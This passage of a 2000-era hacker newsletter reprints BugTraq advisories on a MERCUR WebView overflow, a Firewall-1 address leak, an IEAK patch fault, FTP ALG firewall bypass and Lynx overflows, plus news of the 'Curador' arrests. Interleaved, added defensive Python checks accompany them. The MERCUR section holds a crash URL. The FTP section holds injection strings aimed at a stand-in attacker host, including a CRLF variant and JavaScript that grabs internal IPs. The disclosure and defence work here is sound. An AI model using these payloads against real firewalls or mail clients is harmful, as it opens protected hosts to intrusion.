      installed, just the built in AT scheduler). I have also tested this with
      all combinations of Local and Domain accounts for both the
      scheduler and the interactive user. I have tested it with and without
      persistent drive mappings present for either user - in each case,
      whoever gets the login first gets the drive letter. 
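      Both "exploits" in the post hinge on the scheduled script trusting a
      drive letter it did not map itself. One check a defender can add to
      such a script, given here as an added example that is not part of the
      original post, is to refuse to proceed unless the letter is free or
      already points at the expected share, and to treat anything else as a
      hard failure rather than running whatever happens to be behind the
      letter. The `net use` listing below is a constructed sample in the
      layout that command prints, and the share names are mine; in a real
      script the text would come from running `net use` and capturing its
      output. This does not fix the design issue the author describes, but
      it turns a silent run from the wrong share into a logged abort.

```python
import re

# Constructed sample of `net use` output on a workstation where an
# interactive user already holds P: for a share of their own, while the
# scheduled script expects P: to be free for \\UPDSRV\patches.
NET_USE_OUTPUT = r"""New connections will be remembered.


Status       Local     Remote                    Network

-------------------------------------------------------------------------------
OK           P:        \\WORKSTATION7\share      Microsoft Windows Network
OK           H:        \\FILESRV\home$           Microsoft Windows Network
The command completed successfully.
"""

# One mapping row: status word, drive letter, UNC path (network name ignored).
_MAPPING_LINE = re.compile(r"^(OK|Disconnected|Unavailable)\s+([A-Za-z]:)\s+(\\\\\S+)")


def parse_net_use(text):
    """Return {drive letter: UNC path} for every mapping in a `net use` listing."""
    mappings = {}
    for line in text.splitlines():
        m = _MAPPING_LINE.match(line.strip())
        if m:
            mappings[m.group(2).upper()] = m.group(3)
    return mappings


def check_mapping(letter, expected_unc, net_use_text):
    """Decide whether a scheduled script may use `letter` for `expected_unc`.

    Returns one of:
      ("free", None)       letter is unmapped; the script may map it itself
      ("ok", unc)          letter already points at the expected share
      ("conflict", unc)    letter points elsewhere; abort, do not run from it
    """
    mappings = parse_net_use(net_use_text)
    current = mappings.get(letter.upper())
    if current is None:
        return "free", None
    if current.lower() == expected_unc.lower():
        return "ok", current
    return "conflict", current
```

      The comparison is case-insensitive because Windows share paths are;
      the decision is deliberately three-valued so the script can log the
      conflicting target, which is exactly the evidence an administrator
      would want when investigating who mapped the letter first.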
      

      @HWA
      
       
105.0 HNS:DoS Attack in MERCUR WebView 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      Posted @ March 15, 2000
      UssrLabs found a buffer overflow in MERCUR WebView
      WebMail-Client 1.0 where they do not use proper bounds checking in
      the code that handles the GET commands. The following all result in a
      Denial of Service against the service in question. ... 
            
      DoS Attack in MERCUR WebView 
      Posted to BugTraq on March 15, 2000

      USSR Advisory Code: USSR-2000036

      Release Date:
      March 16, 2000

      Systems Affected:
      MERCUR WebMail-Client Version 1.0 port (1080)

      THE PROBLEM

      UssrLabs found a buffer overflow in MERCUR WebView
      WebMail-Client 1.0 where they do not use proper bounds checking in
      the code that handles the GET commands. The following all result in a
      Denial of Service against the service in question.

      Example:
      http://hostip:1080/mmain.html&mail_user=(buffer)

      Where [buffer] is approx. 1000 characters. (0)

      Binary or source for this Exploit: 

      http://www.ussrback.com/

      Exploit:
      The exploit crashes the remote machine's WebMail service.

      Vendor Status:
      informed

      Vendor Url:
      http://www.atrium-software.com
      Program Url:
      http://www.atrium-software.com/mercur/webview_e.html

      Credit: USSRLABS

      SOLUTION
      Nothing yet.
      
      
      @HWA
      

106.0 HNS:Problem with Firewall-1
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/ 

      Posted @ March 15, 2000
      The Dartmouth College security group has uncovered a problem
      with Firewall-1 which could lead to the protected site handing out
      more IP address info than intended. ..
      
      Problem with Firewall-1
      Posted to BugTraq on March 15, 2000

      The Dartmouth College security group has uncovered a problem
      with Firewall-1 which could lead to the protected site handing out
      more IP address info than intended.

      Under certain nominal load conditions (CPU less than 40%, 200+
      active sessions) Firewall-1 will begin "leaking" packets with their
      private address information intact. The result is that the receiving
      site will receive a SYN=1 that it will be unable to respond to. Once
      the client attempts a resend, the target network (or anyone in the
      middle) can use the source port information to enumerate the client's
      true IP address.

      Here is a Snort trace which has been sanitized and formatted for
      easier viewing:

      Mar 9 14:01:19 172.30.1.10:1721 -> 192.168.1.5:80 SYN **S*****
      Mar 9 14:01:48 200.200.200.5:1721 -> 192.168.1.5:80 SYN **S*****
      Mar 9 14:04:35 172.30.1.10:1858 -> 192.168.1.5:80 SYN **S*****
      Mar 9 14:05:05 200.200.200.5:1858 -> 192.168.1.5:80 SYN **S*****
      Mar 9 14:23:25 172.16.5.20:4868 -> 192.168.1.5:80 SYN **S*****
      Mar 9 14:23:51 200.200.200.5:4868 -> 192.168.1.5:80 SYN **S*****

      So the first packet goes out with the private address information
      still in place and SYN=1. When the client does not receive a reply,
      it retransmits the SYN=1. Since FW-1 considers this to be part of
      the same session, the same source port number is assigned. If the
      second packet gets translated properly (as in these traces) the
      source port info can potentially be used to map the legal IP address
      to the private address.

      Of course the problem here is that a would-be bad guy now knows
      the client's true IP address. If enough hosts are recorded, it's
      possible that most of the internal network address space could be
      enumerated.

      This problem has been noted on Firewall-1 versions 3.0b & 4.0. 4.1
      has not been checked but it's expected that the same problem may
      exist. We were able to reproduce the problem on a Nokia IP440 and
      NT. I've seen this problem on Solaris 2.6 as well, but do not have the
      data to back up the statement.

      A quick fix is to apply egress filtering to the border router and
      block all private addressing that attempts to leak through. A how-to
      on egress can be found at:
      http://www.sans.org/y2k/egress.htm

      Cheers all,
      Chris
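      The correlation Chris describes can be automated on the sensor side so
      that a leak raises an alert instead of waiting to be noticed in a trace.
      The detection logic below is an added example, not part of the original
      post: it parses Snort lines in the sanitized format shown above, groups
      SYNs by destination and source port (which FW-1 keeps constant across
      the retransmission), and reports each session in which a private source
      address was followed by a public one. The sample input is the trace from
      the post; the function names are mine.

```python
import ipaddress
import re
from collections import defaultdict

# The sanitized Snort lines from the post above, used as sample input.
SNORT_TRACE = """\
Mar 9 14:01:19 172.30.1.10:1721 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:01:48 200.200.200.5:1721 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:04:35 172.30.1.10:1858 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:05:05 200.200.200.5:1858 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:23:25 172.16.5.20:4868 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:23:51 200.200.200.5:4868 -> 192.168.1.5:80 SYN **S*****
"""

# "Mon D HH:MM:SS src:sport -> dst:dport SYN ..." as shown in the trace.
_LINE = re.compile(
    r"^(?P<ts>\w+\s+\d+\s+\d\d:\d\d:\d\d)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+"
    r"(?P<dst>[\d.]+):(?P<dport>\d+)\s+SYN\b")


def parse_syns(text):
    """Yield (timestamp, src, sport, dst, dport) for every SYN line, in file order."""
    for line in text.splitlines():
        m = _LINE.match(line.strip())
        if m:
            yield (m["ts"], m["src"], int(m["sport"]), m["dst"], int(m["dport"]))


def _is_private(ip):
    return ipaddress.ip_address(ip).is_private


def correlate_leaks(text):
    """Pair each leaked private-source SYN with its translated retransmission.

    Sessions are keyed by (dst, dport, sport). A session whose first source
    is a private address and which later shows a public source is reported
    as (private_ip, public_ip, sport): the private->public mapping an
    observer could build from the same trace."""
    sessions = defaultdict(list)
    for ts, src, sport, dst, dport in parse_syns(text):
        sessions[(dst, dport, sport)].append(src)
    leaks = []
    for (dst, dport, sport), sources in sessions.items():
        first_private = next((i for i, s in enumerate(sources) if _is_private(s)), None)
        first_public = next((i for i, s in enumerate(sources) if not _is_private(s)), None)
        if first_private is not None and first_public is not None and first_private < first_public:
            leaks.append((sources[first_private], sources[first_public], sport))
    return sorted(leaks)


def exposed_private_hosts(text):
    """Sorted list of internal addresses that leaked at least once; the set an
    egress filter on the border router should have blocked."""
    return sorted({private for private, _public, _sport in correlate_leaks(text)})
```

      A leaked SYN with no matching translated retransmission is not
      reported, because without the second packet there is nothing for an
      outsider to correlate; if you also want to alert on the bare leak, the
      egress-filter rule the post recommends is the right place, since a
      private source address should never cross the border at all.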
      
      
      @HWA. 
      

107.0 HNS:Freeze Distribution of IE 5.0, 5.0a, and 5.0b
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      Posted @ March 15, 2000
      Microsoft has just discovered a serious problem when a user
      attempts to install the 128-bit security patch for Internet Explorer 5.0,
      5.0a and 5.0b on Windows 2000 as part of an IE5.0 IEAK package.
      After restarting the system, users will not be able to log on to
      Windows 2000 ... 
      
      Freeze Distribution of IE 5.0, 5.0a, and 5.0b
      Posted to BugTraq on March 15, 2000

      Microsoft has just discovered a serious problem when a user
      attempts to install the 128-bit security patch for Internet Explorer 5.0,
      5.0a and 5.0b on Windows 2000 as part of an IE5.0 IEAK package.
      After restarting the system, users will not be able to log on to
      Windows 2000.

      The instructions to incorporate the 128-bit security patch into
      IEAK packages say you should use the command line switches:
      "/q:a /r:n /n:v"
      The /n:v switch when used with ie5dom.exe (the 128-bit security
      patch for 5.0x) causes important security files on Windows 2000 to
      be replaced with older files, preventing users from logging on.
      Installations created using IEAK 5.0 for Windows 95, Windows 98,
      and Windows NT4 systems with the ie5dom.exe, and these
      command line parameters specified, are not affected.

      It is critical that you freeze distribution of IE 5.0, 5.0a or 5.0b
      builds that incorporate the 128-bit security patch with these
      switches. Please take immediate action to help prevent more
      customers from encountering this issue.

      Please check http://www.microsoft.com/windows/ieak/en/support/faq/default.asp
      and Microsoft Knowledge Base (KB) article Q255669
      for updates to this issue.
      Note: It may take 24 hours from the original issuance of this bulletin
      for the Microsoft Knowledge Base (KB) article related to this issue to
      be visible.

      We sincerely apologize for this inconvenience and thank you in
      advance for your help in protecting end users.

      Thank you, The IEAK Product Team

      Checking to see if you have included this command-line switch:

      To check a package for this issue:

      Open your IEAK package in the IEAK Wizard and go to the Custom
      Components screen. Examine each custom component. If you have
      included ie5dom.exe as a custom component, check the command
      line switches for '/R:N /Q:A /N:V'

      *OR*

      If you don't have the IEAK Wizard available to you:

      1) Extract your custom IE 5.0x package by running this command
      line:'ie5setup.exe /c /t:'

      2) Browse to the directory. Open 'iesetup.cif' in Notepad.

      3) Look for a section like this:

      [CUSTOM0]
      SectionType=Component
      DisplayName='128-bit Security'
      URL1='Ie5dom.exe',2
      GUID=128PATCH
      Command1='Ie5dom.exe'
      Switches1='/R:N /Q:A /N:V'
      Type1=2
      UninstallKey=''
      Version=
      Size=216
      Platform=win95,win98,nt4,nt5,
      Modes='0,1,2'
      Details='128-bit Securiy'
      Group=CustItems
      Priority=500
      UIVisible=0

      4) Examine for:

      Switches1='/R:N /Q:A /N:V'

      If you have this switch listed, immediately freeze distribution of
      this package!!!
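
      Steps 1 to 4 above amount to reading iesetup.cif and looking for a
      component that runs ie5dom.exe with /N:V. The block below does that
      check from any machine once the package has been extracted. It is an
      added example, not code from Microsoft or the IEAK Product Team,
      and it assumes only what the bulletin shows: an INI-style file whose
      component sections carry CommandN, SwitchesN and Platform keys.
      SAMPLE_CIF is a constructed copy of the [CUSTOM0] section quoted
      above plus one constructed harmless section for contrast.

```python
"""Scan an extracted IEAK package's iesetup.cif for the ie5dom.exe /N:V
switch that the bulletin above tells administrators to look for.

Added example, not code from Microsoft or the IEAK team. It assumes only
what the bulletin shows: iesetup.cif is an INI-style file whose component
sections carry CommandN/SwitchesN/Platform keys.
"""

# Constructed sample: the bulletin's [CUSTOM0] plus a harmless section.
SAMPLE_CIF = """\
[CUSTOM0]
SectionType=Component
DisplayName='128-bit Security'
URL1='Ie5dom.exe',2
GUID=128PATCH
Command1='Ie5dom.exe'
Switches1='/R:N /Q:A /N:V'
Type1=2
Platform=win95,win98,nt4,nt5,

[CUSTOM1]
SectionType=Component
DisplayName='Constructed harmless add-on'
Command1='other.exe'
Switches1='/Q:A'
Platform=win95,win98,
"""


def parse_cif(text):
    """Minimal INI reader: {section: {lowercased key: raw value}}."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections[current] = {}
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections


def switches(value):
    """'/R:N /Q:A /N:V' -> {'/R:N', '/Q:A', '/N:V'}; quotes and case ignored."""
    return set(value.strip("'\"").upper().split())


def risky_components(text, max_commands=9):
    """Sections that run ie5dom.exe with /N:V, paired with a flag saying
    whether the component targets Windows 2000 (nt5), the platform the
    bulletin says the switch actually breaks."""
    hits = []
    for name, keys in parse_cif(text).items():
        for n in range(1, max_commands + 1):   # Command1/Switches1, Command2/...
            command = keys.get(f"command{n}", "").lower()
            if "ie5dom.exe" not in command:
                continue
            if "/N:V" in switches(keys.get(f"switches{n}", "")):
                targets_nt5 = "nt5" in keys.get("platform", "").lower()
                hits.append((name, targets_nt5))
                break
    return hits


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CIF
    for section, nt5 in risky_components(text):
        print(f"FREEZE: [{section}] runs ie5dom.exe with /N:V"
              f"{' and targets Windows 2000' if nt5 else ''}")
```

      Run it with the path to the extracted iesetup.cif as the only
      argument. The nt5 flag is informational: the bulletin says to freeze
      any build carrying the switch combination, whichever platforms it
      lists.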
      
      
      @HWA
      

108.0 HNS:Extending the FTP "ALG" vulnerability 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/ 

      Posted @ March 15, 2000
      It is possible to cause many firewalls to open arbitrary ports allowing
      external hosts to connect to "protected" clients. In this case, it is
      done by fooling the protected client into sending a specially crafted
      FTP request through the firewall, which it misinterprets as a
      legitimate FTP "PORT" command ... 
      

      Extending the FTP "ALG" vulnerability 
      Posted to BugTraq on March 15, 2000

      Author: Mikael Olsson, EnterNet Sweden
      mikael.olsson@enternet.se
      Original Date: 2000-03-10
      Originally posted to: Bugtraq, Vuln-dev (BID 1045)
      Vendor contacted: Nope, sorry, too many.

      Updated: 2000-03-14
      - Added browser-specific info
      - Begun writing a list of firewalls expected to be vulnerable
      - Rewrote a couple of paragraphs that were causing much head
      scratching


      Synopsis

      It is possible to cause many firewalls to open arbitrary ports allowing
      external hosts to connect to "protected" clients.

      In this case, it is done by fooling the protected client into sending a
      specially crafted FTP request through the firewall, which it
      misinterprets as a legitimate FTP "PORT" command.

      Basic idea : how to open arbitrary ports against a client

      * Send a HTML email to an HTML-enabled mail reader containing
      the tag


      You could also conceivably plant a web page somewhere on a
      server containing this link. Please reference CERT advisory
      CA-2000-02: Malicious HTML Tags Embedded in Client Web
      Requests http://www.cert.org/advisories/CA-2000-02.html

      * Balance the number of A so that the PORT command will begin on
      a new packet boundary. This may also be done by having the server
      use a low TCP MSS to decrease the number of A's that one has to
      add.

      * The firewall in question will incorrectly parse the resulting RETR
      /aaaaaaaa[....]aaaaaPORT 1,2,3,4,0,139 as first a RETR command
      and then a PORT command and open port 139 against your address
      (1.2.3.4 in this case)

      * Now the server ftp.rooted.com can connect to the client on port
      139. Ouch.

      Before you ask:
      No, it does not have to be port 139. It can be any port. Some
      firewalls disallow "known server ports" for these connections; such
      ports cannot be used, but I'm betting there are plenty other ports
      that can be used in such cases.

      Address translation playing games

      You have to know the IP address of the client in order to fool the
      firewall into opening the port.

      If the client is not dynamically NATed, this is easy.

      If the client IS dynamically NATed, this is a bit harder.

      How to make it work through address translation

      There are several ways to figure out what the private address is.
      Here's two:

      * Send an email to the address in question containing an img src
      ftp://ftp.rooted.com:23456 and hope that the firewall won't realise
      that port 23456 is FTP. PORT commands won't be translated this
      way, so the private IP address will be exposed. This assumes that
      23456 is allowed through the firewall and that it won't attempt to
      parse FTP command data on that port.

      * Send an email with a link to a web page that contains javascript
      that extracts the private IP address and posts it to the server.

      The javascript code below works on Netscape; I don't know what the
      equivalent is for MSIE.

      var tool = java.awt.Toolkit.getDefaultToolkit();
      addr = java.net.InetAddress.getLocalHost();
      ip = addr.getHostAddress();

      Once we know about the IP address, we can adjust the img src so
      that it is valid for that specific internal client.

      The dynamic translation will also likely change the port number
      opened on the NAT:ed public address, but that's ok. All we have to
      do is have our fake FTP server read the command packet containing
      the PORT command, as changed by the firewall, and we'll know
      what public address and port to connect to in order to get to our
      desired port on the "protected" client.

      I think I've heard about reverse firewall penetration before

      Yeah, the idea of internal users fooling a firewall to let them out isn't
      new, but the scope of this vulnerability is "new" IMHO.

      Basically, you can get at anyone with a browser or HTML-enabled
      mail reader protected by firewalls that have more than 50% market
      coverage. That's bad.

      What about Checkpoint's FTP PASV fix for FW-1?

      Checkpoint's fix for FW-1 is to make sure that every packet in the
      command stream ends with CRLF (0x0a 0x0d in hex). That would
      help against the above attack, but not if we modify it a wee bit:

      src="ftp://ftp.rooted.com/aaaaaaa%0a%0dPORT 1,2,3,4,0,139"

      Ouch. This WILL work in Netscape v4.7 (I've verified it using a
      network sniffer, anyone care for a packet dump?).

      The firewall will see this as two separate commands: RETR
      aaaaaaaaaa PORT 1,2,3,4,0,139

      which means that poorly implemented proxies are likely to be
      vulnerable as well.

      This in and of itself is a browser bug IMHO. Line feeds are not valid
      characters in a file name.

      Added: 2000-03-14

      Apparently, this CRLF variant will _not_ work in MSIE (version
      unknown?). It's doing the right thing: stripping out the CRLF.
      (Second hand info, I have not verified MSIE's behaviour)

      No information on other browsers or mail readers.

      Other fixes?

      I haven't seen other firewall vendors make public claims that they
      protect against any of these attacks. Cisco is apparently working on
      a fix for PIX, but it's taking time, so I'm guessing they're doing it the
      right way - since doing it the right way really does take quite a bit of
      time.

      It would seem like all the others are silently going to sneak fixes into
      their upcoming updates and pretend like they never were vulnerable
      in the first place. Grumble.

      Added: 2000-03-14

      I suspect that FW-1's security servers may disable this attack.
      (Dunno, I'm not an FW-1 user)


      What firewalls are likely to be vulnerable?

      This specific attack is likely to work against most "stateful
      inspection" firewalls with poorly implemented application layer filters.
      This probably includes most products out there.

      It may also affect poorly implemented "proxies" when the CRLF is
      added before the PORT command as described above.

      Added: 2000-03-14

      Checkpoint FW-1 v3 is likely to allow connections on most ports
      1024-65535 with full bidirectional communication

      Checkpoint FW-1 v4 is likely to allow connection on most ports
      1024-65535 with only unidirectional communication

      Cisco PIX is likely to allow connections to any port with full
      bidirectional communication

      Linux's ip_masq_ftp module is _really_ easy to fool, according to
      Solar Designer. It will accept a "PORT" command anywhere in a
      packet. This means that even this is likely to work:
      "http://rooted.com:21/PORT 1,2,3,4,0,139"

      This is likely NOT a complete list. And no, I'm not going to get in
      touch with vendors and report the vulnerability. There are just too
      many that are likely to be affected.


      "The great picture"

      Other protocols than FTP are likely to be affected by this type of
      vulnerability - pretty much any protocol that opens up ephemeral ports
      after the initial command session. A couple that come to mind are:

      * Oracle SQL*Net (versions using separate data channels)
      * RealAudio/Video (secondary UDP channel)
      * H.323 (NetMeeting et al)
      THIS IS NOT A COMPLETE LIST. Those were just a couple of
      common ones off the top of my head.


      Workarounds to this specific vulnerability

      * Disable active FTP. Errrr, wait. The fix for the server side
      vulnerability was to disable passive FTP. Let's rephrase that:

      * Disable FTP altogether. Block port 21. Disable FTP Application
      Layer Filters on all ports in your firewall.

      * If you can't change the settings in your firewall, set the "FTP
      Proxy" setting in your browser/HTML-enabled mail reader to some
      address that doesn't exist, like 127.0.0.2. After this change, your
      browser won't be able to connect anywhere using FTP.
      (From Solar Designer: This does not help if you're using
      ip_masq_ftp, since it'll be fooled by HTTP looking like FTP.)
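
      The three command strings quoted in the advisory (the packet-boundary
      split, the %0a%0d variant and the ip_masq_ftp case) all defeat an ALG
      that scans each packet for the string PORT. As an added example, not
      part of Mikael Olsson's post and not any vendor's code, the block
      below puts that naive per-packet scan next to a parser written the way
      the advisory's complaints imply one should be: reassemble the client's
      command stream, treat only CRLF (0x0d 0x0a) as a line terminator, drop
      any line that still contains a control byte, and honour PORT only when
      it is the whole line. Packet payloads are constructed from the
      advisory's strings; 1.2.3.4 is its example client address, and port
      1234 is a constructed stand-in for 139 so that the line handling is
      exercised separately from the low-port check.

```python
"""Hardened FTP ALG command parsing versus the naive per-packet style.

Added example, not Mikael Olsson's code and not any vendor's ALG. The
packet byte strings are constructed from the command strings quoted in
the advisory; 1.2.3.4 is the advisory's example client address.
"""
import re

# h1,h2,h3,h4,p1,p2 as defined by RFC 959
_PORT_ARGS = r"(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})"
PORT_LINE_RE = re.compile(r"^PORT " + _PORT_ARGS + r"$")   # whole line only
PORT_ANYWHERE_RE = re.compile(r"PORT " + _PORT_ARGS)       # what the naive ALG does


def _decode(m):
    host = ".".join(m.group(i) for i in range(1, 5))
    port = int(m.group(5)) * 256 + int(m.group(6))
    return host, port


def naive_alg(packets):
    """Per-packet scan: 'PORT h1,h2,h3,h4,p1,p2' anywhere in any packet
    opens a hole.  Returns the (host, port) pairs it would open."""
    holes = []
    for pkt in packets:
        m = PORT_ANYWHERE_RE.search(pkt.decode("latin-1"))
        if m:
            holes.append(_decode(m))
    return holes


class StrictFtpAlg:
    """Reassemble the client's command stream and act only on complete,
    well-formed command lines."""

    def __init__(self, client_ip):
        self.client_ip = client_ip
        self.buf = b""
        self.holes = []      # (host, port) pairs the firewall would open
        self.rejected = []   # raw lines dropped as malformed

    def feed(self, pkt):
        """Consume one TCP segment's payload from the client."""
        self.buf += pkt
        while True:
            i = self.buf.find(b"\r\n")     # only CRLF ends a command
            if i < 0:
                return                      # wait for the rest of the line
            line, self.buf = self.buf[:i], self.buf[i + 2:]
            self._handle(line)

    def _handle(self, line):
        # A bare CR or LF (the %0a%0d variant) or any other control byte
        # has no business inside an FTP command line: drop it unparsed.
        if any(b < 0x20 or b == 0x7F for b in line):
            self.rejected.append(line)
            return
        m = PORT_LINE_RE.match(line.decode("ascii", "replace"))
        if not m:
            return      # RETR, USER, GET, ...: nothing for the ALG to do
        host, port = _decode(m)
        # Belt and braces: the hole must point at the client itself and
        # never at a well-known service port.
        if host != self.client_ip or port < 1024 or port > 65535:
            self.rejected.append(line)
            return
        self.holes.append((host, port))


def run_strict(client_ip, packets):
    alg = StrictFtpAlg(client_ip)
    for pkt in packets:
        alg.feed(pkt)
    return alg.holes, alg.rejected


# Constructed test vectors, named after the advisory's cases.
SPLIT_PACKETS = [b"RETR /" + b"a" * 40, b"PORT 1,2,3,4,4,210\r\n"]   # packet-boundary trick
LF_CR_PACKETS = [b"RETR aaaaaaa\n\rPORT 1,2,3,4,4,210\r\n"]           # the %0a%0d variant
HTTP_PACKETS = [b"GET /PORT 1,2,3,4,4,210 HTTP/1.0\r\n"]              # ip_masq_ftp case
LEGIT_PACKETS = [b"PORT 1,2,3,4,4,210\r\n"]                            # a real PORT (port 1234)

if __name__ == "__main__":
    for name, pkts in [("split", SPLIT_PACKETS), ("lf-cr", LF_CR_PACKETS),
                       ("http", HTTP_PACKETS), ("legit", LEGIT_PACKETS)]:
        print(f"{name:6} naive opens {naive_alg(pkts)}  "
              f"strict opens {run_strict('1.2.3.4', pkts)[0]}")
```

      One limit worth keeping in mind: if the client itself emits a
      genuine CRLF inside a file name (%0d%0a rather than %0a%0d), the
      reassembled stream really does contain two lines and this parser will
      honour the second one just as a real FTP server would. That is why
      the advisory calls the browser's acceptance of line feeds in a file
      name a bug in its own right, and why the workarounds above disable
      FTP rather than relying on the filter.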
      
      @HWA
      
109.0 FreeBSD-SA-00:08: Lynx overflows
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Submitted by FProphet
      
      Source: Bugtraq

      Approved-By: aleph1@SECURITYFOCUS.COM
      Delivered-To: bugtraq@lists.securityfocus.com
      Delivered-To: bugtraq@securityfocus.com
      Date:         Wed, 15 Mar 2000 09:34:43 -0800
      Reply-To: security-officer@freebsd.org
      Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
      Comments:     RFC822 error: <W> FROM field duplicated. Last occurrence was
                    retained.
      From: FreeBSD Security Officer <security-officer@freebsd.org>
      Subject:      FreeBSD Security Advisory: FreeBSD-SA-00:08.lynx
      To: BUGTRAQ@SECURITYFOCUS.COM
      
      -----BEGIN PGP SIGNED MESSAGE-----
      
      =============================================================================
      FreeBSD-SA-00:08                                           Security Advisory
                                                                      FreeBSD, Inc.
      
      Topic: Lynx ports contain numerous buffer overflows
      
      Category:       ports
      Module:         lynx/lynx-current/lynx-ssl/ja-lynx/ja-lynx-current
      Announced:      2000-03-15
      Affects:        Ports collection before the correction date.
      Corrected:      See below.
      FreeBSD only:   NO
      
      I.   Background
      
      Lynx is a popular text-mode WWW browser, available in several versions
      including SSL support and Japanese language localization.
      
      II.  Problem Description
      
      The lynx software is written in a very insecure style and contains numerous
      potential and several proven security vulnerabilities (publicized on the
      BugTraq mailing list) exploitable by a malicious server.
      
      The lynx ports are not installed by default, nor are they "part of FreeBSD"
      as such: they are part of the FreeBSD ports collection, which contains over
      3100 third-party applications in a ready-to-install format.
      
      FreeBSD makes no claim about the security of these third-party
      applications, although an effort is underway to provide a security audit
      of the most security-critical ports.
      
      III. Impact
      
      A malicious server which is visited by a user with the lynx browser can
      exploit the browser security holes in order to execute arbitrary code as
      the local user.
      
      If you have not chosen to install any of the
      lynx/lynx-current/lynx-ssl/ja-lynx/ja-lynx-current ports/packages, then
      your system is not vulnerable.
      
      IV.  Workaround
      
      Remove the lynx/lynx-current/lynx-ssl/ja-lynx/ja-lynx-current ports, if you
      have installed them.
      
      V.   Solution
      
      Unfortunately, there is no simple fix to the security problems with the
      lynx code: it will require a full review by the lynx development team and
      recoding of the affected sections with a more security-conscious attitude.
      
      In the meantime, there are two other text-mode WWW browsers available in
      FreeBSD ports: www/w3m (also available in www/w3m-ssl for an SSL-enabled
      version, and japanese/w3m for Japanese-localization) and www/links.
      
      Note that the FreeBSD Security Officer does not make any recommendation
      about the security of these two browsers - in particular, they both appear
      to contain potential security risks, and a full audit has not been
      performed, but at present no proven security holes are known. User beware -
      please watch for future security advisories which will publicize any such
      
      vulnerabilities discovered in these ports.
      
      -----BEGIN PGP SIGNATURE-----
      Version: 2.6.2
      
      iQCVAwUBOM/JklUuHi5z0oilAQEbzQP+K5HbTRk40fmb+pKOcUDD/r4ofcrkWtXn
      Ya7PT/ALXvUnohm/jqKofNk9cXK1EspbgHb9N1OJZEzcYUAy378WpQgWh4uxKQa7
      +541CwFPPIbWfJQJCOaUODN2qwnXdqXMj6noCKRMN0c3tBRG6R2zEfVaM1vMNS1+
      +vcp5WAqDu4=
      =dtMU
      -----END PGP SIGNATURE-----
       
      
      @HWA      
      
110.0 Curador? BUSTED
      ~~~~~~~~~~~~~~~      
      
      Contributed by Abattis (Wired) and MerXor (MSNBC) 
      Follow-ups by Cruci. (MSNBC) more from HNN in section 119.0 
      
      -=-
      
      Sources: Wired, MSNBC
      
      http://www.wired.com/news/business/0,1367,35186,00.html
      
      Alleged Hackers Arrested 
      Reuters 

      2:05 p.m. Mar. 24, 2000 PST


      The FBI said Friday that two 18-year-olds had been arrested in Wales for 
      allegedly hacking into nine e-commerce websites around the world and 
      stealing credit card information. 

      The losses connected with the intrusions on websites in the United States, 
      Canada, Thailand, Japan, and Britain could exceed US$3 million, the FBI 
      said in a news release. 


      It said the theft of credit card information related to more than 26,000 
      accounts, the alleged scheme involved the disclosure of the data on the 
      Internet, and that the accused hackers used the screen name "Curador." 

      The two youths, who cannot be identified under British law, were arrested 
      Thursday by the Dyfed-Powys Police Service in Wales for violating 
      Britain's Computer Misuse Act, the FBI said. 

      The arrests stemmed from an FBI investigation conducted with the Welsh 
      police, the Royal Canadian Mounted Police, and Internet security 
      consultants, the FBI said, adding that the international banking and 
      credit card industry also provided substantial cooperation. 

      The FBI still is investigating last month's wave of cyber attacks that 
      disrupted some of the Internet's most popular sites. The FBI has yet to 
      make any arrests or bring any charges involving those attacks. 

      The FBI's own website was attacked March 14, the same day the agency 
      celebrated the 50th anniversary of its "Ten Most Wanted Fugitives" list, 
      which is publicized on the site,
      FBI officials said.      
      
      
      -=-
      
      MSNBC;
      
      http://www.msnbc.com/news/386402.asp     
      
      Consultant was key to 'Curador' bust
      The FBI crowed, but security specialist led police to Wales
                                                  By Mike Brunker 
                                                            MSNBC

      March 27 - While the FBI was quick to take credit
      for the arrest last week of two teen-agers who
      allegedly stole information on 26,000 credit cards
      from Internet retailers, a Canadian computer
      security consultant working with British
      authorities tracked the suspects back to their small
      village in Wales before the U.S. agency even got
      involved, MSNBC.com has learned.
      
      A PRESS RELEASE issued Friday by the FBI said the
     arrests of the two 18-year-olds "came as a direct result of an
     FBI investigation."
            It added that unidentified Internet security consultants
     had assisted in the case, but nowhere did it mention Chris
     Davis of HeXedit Network Security Inc. of Ottawa, Ontario,
     who worked for nearly two months assembling the evidence
     that led authorities to the suspects. 
            In interviews with numerous news organizations,
     including MSNBC.com, after the announcement, the FBI's
     Michael Vatis said the arrests should serve as a warning to
     others who would use the Internet to steal.
            "It's important to say that anyone who underestimates
     the skill of our agents ... does so at their own peril," he said.
            
     FBI PLAYED LIMITED ROLE
            But interviews with Davis and other participants in the
     case show that the FBI's role in the investigation of
     "Curador" was limited.
            "They (the FBI) did get involved fairly late," Davis said
     Monday. "By the time they got involved, (British police) had
     phone numbers, home addresses and all that."
             
            Phone calls to the National Infrastructure Protection
     Center, which Vatis heads, were not returned Monday. A
     spokesman for the FBI declined to comment.
            "In anything like this, it really doesn't serve any
     purpose to go back and try to heap credit one way or the
     other," said the spokesman, Paul Bresson. "I think the facts
     speak for themselves."
            But officials of Promobility.net, a wireless phone seller
     in Ontario that was among the sites hit by "Curador,"
     confirmed Davis' account.
            "That is 100 percent accurate," spokesman Eric Geiler
